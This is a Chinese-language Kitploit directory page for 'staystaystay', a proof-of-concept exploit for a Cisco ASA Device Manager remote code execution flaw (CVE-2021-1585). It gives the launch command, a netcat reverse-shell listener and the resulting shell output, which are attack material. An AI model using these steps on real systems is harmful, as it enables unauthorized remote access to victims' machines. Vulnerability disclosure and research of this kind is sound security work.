Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
staystaystay — CVE-2021-1585的概念验证:Cisco ASA Device Manager RCE | Kitploit
工具/GitHubGitHub/jbaines-r7/staystaystay
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具Payload 开发
GitHubjbaines-r7/staystaystay

staystaystay

CVE-2021-1585的概念验证:Cisco ASA Device Manager RCE

查看仓库
134134年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

staystaystay

staystaystay 是一个针对 CVE-2021-1585 的概念验证漏洞利用程序,该漏洞是影响 Cisco ASA Device Manager (ASDM) 的中间人或恶意端点 RCE 问题。该问题最初由 Malcolm Lashley 发现并在 2021 年夏季披露。然而,在我研究此问题时,最新版本 (ASDM 7.17(1)) 仍未修补,我独立发现了它。

Cisco 在 ASDM 7.18(1.152) 中“修复”了此问题。我之所以说“修复”,是因为此漏洞利用仍然有效。用户只需点击“是”。请观看下面的视频。

攻击者可以配置两种类型的有效载荷来获取受害者的反向 shell:

  • 基于 jjs.exe(文件写入磁盘 - 最近已被 Windows Defender 捕获)
  • 基于 Longtime Sunshine

如果受害者将其 ASDM 连接到 staystaystay,则它会注入配置的有效载荷,产生一个反向 shell。jjs 反向 shell 可以使用典型的 nc 监听器(甚至 Metasploit,如果你愿意)捕获。Longtime Sunshine 选项要求攻击者使用该框架。

例如,以下命令将使用 jjs 有效载荷在 8443 端口上启动 staystaystay:

root@kitploit:~
./staystaystay -j --lhost 10.0.0.2 --lport 1270 --https_port 8443

一旦受害者连接到 8443,将生成一个到 10.0.0.2:1270 的反向 shell:

root@kitploit:~
albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.0.0.26 50283
Microsoft Windows [Version 10.0.19042.1645]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\Cisco Systems\ASDM>whoami
whoami
desktop-1hug9pt\albinolobster

C:\Program Files (x86)\Cisco Systems\ASDM>

以下视频包含使用 Longtime Sunshine 进行漏洞利用的示例:

  • https://www.youtube.com/watch?v=07VO2JGTWR8

以下视频演示了针对已修补版本的攻击:

  • https://www.youtube.com/watch?v=ySgbHClk9HE

可以在以下位置找到 AttackerKB 的分析文章:

  • https://attackerkb.com/topics/0vIso8fLhQ/cve-2021-1585/rapid7-analysis

致谢

  • Taylor Swift - 原声版
下载工具